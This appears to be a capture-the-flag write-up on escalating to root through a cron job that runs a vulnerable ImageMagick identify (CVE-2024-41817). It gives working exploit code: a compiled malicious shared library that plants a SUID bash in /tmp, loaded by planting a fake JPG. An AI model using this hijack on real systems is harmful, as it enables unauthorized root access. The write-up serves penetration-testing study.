developer@titanic:~$ ls /opt/scripts/ -l

total 4

-rwxr-xr-x 1 root root 167 Feb 3 17:11 identify_images.sh

The script identify_images.sh is surprisingly simple:

cd /opt/app/static/assets/images

truncate -s 0 metadata.log

find /opt/app/static/assets/images/ -type f -name "*.jpg" | xargs /usr/bin/magick identify >> metadata.log

Code Review | identify_images.sh

The suspicious script first changes directory to /opt/app/static/assets/images, which contains:

developer@titanic:~$ ls -l /opt/app/static/assets/images

total 1280

-rw-r----- 1 root developer 291864 Feb 3 17:13 entertainment.jpg

-rw-r----- 1 root developer 280854 Feb 3 17:13 exquisite-dining.jpg

-rw-r----- 1 root developer 209762 Feb 3 17:13 favicon.ico

-rw-r----- 1 root developer 232842 Feb 3 17:13 home.jpg

-rw-r----- 1 root developer 280817 Feb 3 17:13 luxury-cabins.jpg

-rw-r----- 1 root developer 442 Feb 16 13:19 metadata.log

This means all subsequent commands execute inside this directory.

Then it clears the contents of metadata.log:

truncate -s 0 metadata.log

This empties metadata.log (sets its size to 0), which is owned by root. But we can read it as developer:

developer@titanic:/opt/app/static/assets/images$ cat metadata.log

/opt/app/static/assets/images/luxury-cabins.jpg JPEG 1024x1024 1024x1024+0+0 8-bit sRGB 280817B 0.000u 0:00.003

/opt/app/static/assets/images/entertainment.jpg JPEG 1024x1024 1024x1024+0+0 8-bit sRGB 291864B 0.000u 0:00.000

/opt/app/static/assets/images/home.jpg JPEG 1024x1024 1024x1024+0+0 8-bit sRGB 232842B 0.000u 0:00.000

/opt/app/static/assets/images/exquisite-dining.jpg JPEG 1024x1024 1024x1024+0+0 8-bit sRGB 280854B 0.000u 0:00.000

The contents of metadata.log show the result of ImageMagick’s identify command processing the .jpg files inside /opt/app/static/assets/images/.

Back to identify_images.sh: it then finds all *.jpg files inside the directory:

find /opt/app/static/assets/images/ -type f -name "*.jpg"

It then passes the found .jpg files to magick identify:

| xargs /usr/bin/magick identify >> metadata.log

Finally, the output is appended (>>) to metadata.log.
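To make the data flow explicit, the find and xargs stages can be mirrored in a few lines of Python. This is only a re-expression of the script for readability, not something present on the box; find_jpgs and build_identify_argv are hypothetical names:

```python
import os


def find_jpgs(root: str) -> list[str]:
    """Rough equivalent of: find ROOT -type f -name '*.jpg'."""
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            # -type f matches regular files only, so symlinks are skipped.
            if name.endswith(".jpg") and os.path.isfile(full) and not os.path.islink(full):
                hits.append(full)
    return sorted(hits)


def build_identify_argv(paths: list[str], magick: str = "/usr/bin/magick") -> list[str]:
    """The command line xargs ends up running for the collected paths."""
    return [magick, "identify", *paths]
```

Two properties matter for what follows: magick runs with the images directory as its working directory, and the only check on a file is that its name ends in .jpg.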

Pspy | Process Snooping

But we cannot run the script successfully ourselves, because metadata.log is only writable by root:

developer@titanic:~$ bash /opt/scripts/identify_images.sh

truncate: cannot open 'metadata.log' for writing: Permission denied

/opt/scripts/identify_images.sh: line 3: metadata.log: Permission denied

And we have very limited visibility into the processes currently running on the machine:

developer@titanic:~$ ps -ef

UID PID PPID C STIME TTY TIME CMD

develop+ 1142 1 0 Feb15 ? 00:00:15 /usr/bin/python3 /opt/app/app.py

develop+ 1637 1635 0 Feb15 ? 00:01:55 /usr/local/bin/gitea web

develop+ 26757 1 0 13:25 ? 00:00:00 /lib/systemd/systemd --user

develop+ 26832 26831 0 13:25 pts/0 00:00:00 -bash

develop+ 31617 26757 0 14:38 ? 00:00:00 /usr/bin/dbus-daemon --session --address=systemd: --nofork --nopidfile -

develop+ 47857 26832 0 14:42 pts/0 00:00:00 ps -ef

So we can run Pspy for process snooping. Pspy is designed to snoop on processes without root permissions. It allows us to see commands run by other users, cron jobs, etc.

Set Pspy to print both commands and file system events every second:

./pspy64 -cpf -i 1000





Based on the pspy output, the script /opt/scripts/identify_images.sh is being opened, accessed, and executed at a consistent interval. This strongly suggests that it's executed by a cron job or a system service.
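The cadence can also be cross-checked without pspy, since the script truncates and rewrites metadata.log on every run and that file is readable by developer. A minimal sketch that samples the file's modification time and reports the gaps between distinct values; the function names and the sampling parameters are arbitrary choices for illustration:

```python
import os
import time


def sample_mtimes(path: str, samples: int, delay: float) -> list[float]:
    """Record the file's modification time `samples` times, `delay` seconds apart."""
    seen = []
    for i in range(samples):
        seen.append(os.stat(path).st_mtime)
        if i < samples - 1:
            time.sleep(delay)
    return seen


def run_intervals(mtimes: list[float]) -> list[float]:
    """Gaps between distinct modification times, i.e. between observed runs."""
    distinct = sorted(set(mtimes))
    return [later - earlier for earlier, later in zip(distinct, distinct[1:])]


# On the target, something like:
#   log = "/opt/app/static/assets/images/metadata.log"
#   print(run_intervals(sample_mtimes(log, samples=40, delay=5)))
```

A steady list of near-identical gaps would support the scheduled-job theory.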

Additionally, we can see magick being executed every minute, loading multiple shared libraries:

Dynamically loaded libraries:

- libstdc++.so.6.0.30

- libharfbuzz.so.0.20704.0

- libuuid.so.1.3.0

- libbrotlidec.so.1.0.9

- libdl.so.2

- libexpat.so.1.8.7

- libxcb.so.1.1.0

CVE-2024-41817 | ImageMagick

The script primarily executes /usr/bin/magick identify with root privileges, seemingly for a simple logging function. Before diving into exploitation, let's first determine the ImageMagick (magick) version installed on the machine:

developer@titanic:~$ /usr/bin/magick

Usage: magick tool [ {option} | {image} ... ] {output_image}

Usage: magick [ {option} | {image} ... ] {output_image}

magick [ {option} | {image} ... ] -script {filename} [ {script_args} ...]

magick -help | -version | -usage | -list {option}

developer@titanic:~$ /usr/bin/magick -version

Version: ImageMagick 7.1.1-35 Q16-HDRI x86_64 1bfce2a62:20240713 https://imagemagick.org

Copyright: (C) 1999 ImageMagick Studio LLC

License: https://imagemagick.org/script/license.php

Features: Cipher DPC HDRI OpenMP(4.5)

Delegates (built-in): bzlib djvu fontconfig freetype heic jbig jng jp2 jpeg lcms lqr lzma openexr png raqm tiff webp x xml zlib

Compiler: gcc (9.4)

Searching for vulnerabilities in ImageMagick version 7.1.1-35 related to its identify command, we find CVE-2024-41817, an arbitrary code execution flaw in the AppImage version of ImageMagick.

There's also a PoC described on GitHub under the official ImageMagick Security Advisory. This vulnerability abuses the way ImageMagick sets the LD_LIBRARY_PATH and MAGICK_CONFIGURE_PATH environment variables.

Its AppRun script might use an empty path when setting the MAGICK_CONFIGURE_PATH and LD_LIBRARY_PATH environment variables. This means we could hijack LD_LIBRARY_PATH, which leads to full compromise of a Linux binary, because an ELF program that loads an attacker-supplied shared object instead of the intended one runs the attacker's code. See the advisory's analysis for details.

Therefore, there are usually two ways to exploit ImageMagick:

- Leveraging a misconfiguration in MAGICK_CONFIGURE_PATH, we can abuse ImageMagick’s XML configuration (delegates.xml) to execute arbitrary commands. If MAGICK_CONFIGURE_PATH is not set correctly, ImageMagick may look for delegates.xml in the current working directory (./) when it searches for configuration files. We can place a malicious delegates.xml file there, causing ImageMagick to execute arbitrary system commands when processing it.

- Or we can hijack the shared library path LD_LIBRARY_PATH. If we place a malicious shared library (e.g., libxcb.so.1 or another loaded shared object) in the current working directory where ImageMagick runs, the code inside that shared object executes when ImageMagick starts.
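The "empty path" detail is what makes the working directory searchable: the dynamic loader treats a zero-length entry in LD_LIBRARY_PATH as the current directory. A minimal model of that rule, assuming AppRun builds the variable by plain concatenation with whatever was inherited; the bundle directory and both function names below are hypothetical:

```python
def apprun_style_value(bundle_lib_dir: str, inherited: str) -> str:
    """Model of: LD_LIBRARY_PATH="$bundle_lib_dir:$LD_LIBRARY_PATH"."""
    return f"{bundle_lib_dir}:{inherited}"


def effective_search_dirs(ld_library_path: str) -> list[str]:
    """Expand the variable the way the loader does: empty entry means '.'."""
    if not ld_library_path:
        return []  # variable unset or empty: no extra directories
    return [entry if entry else "." for entry in ld_library_path.split(":")]


# Hypothetical bundle path; the inherited value is empty, as in a cron job.
value = apprun_style_value("/tmp/.mount_magick/usr/lib", "")
print(effective_search_dirs(value))
```

With an empty inherited value the concatenation leaves a trailing colon, so the current directory joins the search list. A non-empty inherited value would not produce that entry.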



Based on our Pspy snooping, we should go with the second exploitation method—since the script automatically loads shared libraries. As demonstrated in the PoC, we can exploit LD_LIBRARY_PATH hijacking for privesc.

Step 1, move into the working directory so that all files we create exist in the directory where ImageMagick runs:

cd /opt/app/static/assets/images

Step 2, create a malicious shared library (.so), which should be loaded by /usr/bin/magick. The original PoC uses libxcb.so.1, but we can also use other shared objects discovered during the process snooping, for example libexpat.so.1:

gcc -x c -shared -fPIC -o ./libexpat.so.1 - << EOF
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

/* Runs automatically when the library is loaded. */
__attribute__((constructor)) void init() {
    /* Drop a SUID copy of bash for later use. */
    system("cp /bin/bash /tmp/rootbash && chmod +s /tmp/rootbash");
    exit(0);
}
EOF

This creates a shared library object (libexpat.so.1) using the __attribute__((constructor)) function attribute, which instructs the C compiler to automatically execute a function before main() runs. This is extremely useful in shared library hijacking because the function runs as soon as the library is loaded.

In shared library naming conventions, versioned shared libraries are structured as follows:

- libxxx.so.1.8.7 → This is the real shared object file containing the actual implementation.

- libxxx.so.1 → This is a symlink to the actual versioned shared library.

If a process ends up loading libxxx.so.1.8.7, we don't need to overwrite that file. We just need to plant our own libxxx.so.1, the name that acts as the entry point for dynamic linking.
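Applied to the file names seen in the pspy output, the convention gives the name to plant for each library. The sketch below guesses the short name by keeping only the first version number; this is a heuristic, and the authoritative value is the SONAME recorded in the library itself (for example via readelf -d). The function name guess_soname is made up:

```python
import re

# lib<name>.so.<major>[.<minor>[.<patch>...]]
_REALNAME = re.compile(r"^(lib.+?\.so)\.(\d+)(?:\.\d+)*$")


def guess_soname(realname: str) -> str:
    """Heuristic: keep 'lib<name>.so.<major>' and drop the remaining version parts."""
    match = _REALNAME.match(realname)
    if not match:
        raise ValueError(f"unexpected library name: {realname}")
    return f"{match.group(1)}.{match.group(2)}"


for lib in ("libexpat.so.1.8.7", "libxcb.so.1.1.0", "libstdc++.so.6.0.30", "libdl.so.2"):
    print(lib, "->", guess_soname(lib))
```

For libexpat.so.1.8.7 this yields libexpat.so.1, the file name used in Step 2.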

The script /opt/scripts/identify_images.sh scans all .jpg files in this directory. Therefore, we need to ensure the script processes a new file:



echo 'I am a JPG file.' > real_image.jpgWhen the auto-run script identify_images.sh (running commands for ImageMagick) processes the real_image.jpg, it will load the malicious libexpat.so.1 from the same directory:

Rooted.
